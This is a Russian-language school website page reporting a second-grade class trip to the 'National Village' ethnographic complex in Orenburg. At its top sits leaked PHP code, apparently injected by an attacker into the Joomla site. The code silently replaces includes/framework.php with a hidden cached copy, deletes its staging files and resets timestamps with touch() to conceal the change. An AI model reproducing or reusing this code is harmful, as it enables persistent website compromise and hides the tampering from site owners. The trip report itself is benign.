$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Экскурсия в культурный комплекс «Национальная деревня».

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209734

На сайте

Сейчас 97 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Экскурсия в культурный комплекс «Национальная деревня».

      31 октября 2017года для учащихся 2 класса МБОУ «Сагарчинская СОШ» была организована поездка  в город Оренбург. Ребята посетили культурный комплекс «Национальная деревня».

      Цель экскурсии: этнокультурное развитие младших школьников посредством приобщения к культуре и традициям народов Оренбуржья.

     

Задачи:

- расширять представления о родном крае;

- развивать познавательный интерес к истории родного края;

- воспитывать любовь к большой и малой Родине, уважительное отношение к людям разных народов, национальностей.

      Своеобразным символом этнокультурного взаимодействия народов, проживающих в области, стал  созданный в городе Оренбурге культурный комплекс «Национальная деревня» Под открытым небом устлана вымощенная аллея, по краям которой стоят национальные подворья. Во время экскурсии ребята познакомились с некоторыми из них.

   Русское подворье. Центральное здание построено в виде терема, крыша покрыта деревянной черепицей, есть резная лестница, столбы и балкон. На территории подворья есть мельница, колодец и баня. К сожалению, нам не довелось попасть   внутрь избы, так как  подворье было закрыто.

     Казахское подворье представляет сочетание прошлого и настоящего. Несколько юрт различного  расположения расположились на фоне современного здания в  восточном стиле. В одной из них находится музей казахской культуры и быта, в другой – кафе. В музее представлены образцы национальной одежды, оружие, музыкальные инструменты, предметы домашнего обихода. Перед юртами лежит верблюд. Особое внимание посетителей привлекают казахские качели.

 На территории татарского подворья разместились историко-этнографический музей, представляющий собой типовой татарский дом конца XIX– начала XXвеков,  ресторанно –гостиничный комплекс и редакция «Яна Вакып».

    Мордовское подворье. Основное здание подворья построено из самых современных материалов. А вот здание музея из старого бревенчатого сруба, украшенного традиционной резьбой. В подворье имеется все необходимое для жизни – от печи и младенческой люльки, которые располагаются в доме – музее, до телеги и колодца во дворе.

    В «Национальной деревне» имеются и другие подворья, с которыми мы не смогли познакомиться. Надеемся, что в них мы побываем в следующий раз.

     Довольные и радостные, под впечатлением увиденного  и услышанного мы возвращались домой. Ребятам очень понравилось!

                                                Классный руководитель 2 класса  Валькова Б.Б